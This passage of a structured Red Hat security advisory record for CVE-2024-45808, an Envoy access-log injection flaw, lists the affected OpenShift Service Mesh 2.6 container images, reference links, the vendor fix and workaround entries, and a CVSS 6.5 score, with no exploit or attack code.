applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45808", }, { category: "external", summary: "RHBZ#2313685", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313685", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45808", url: "https://www.cve.org/CVERecord?id=CVE-2024-45808", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45808", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45808", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc", }, ], release_date: "2024-09-20T00:15:02.733000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Malicious log injection via access logs", }, 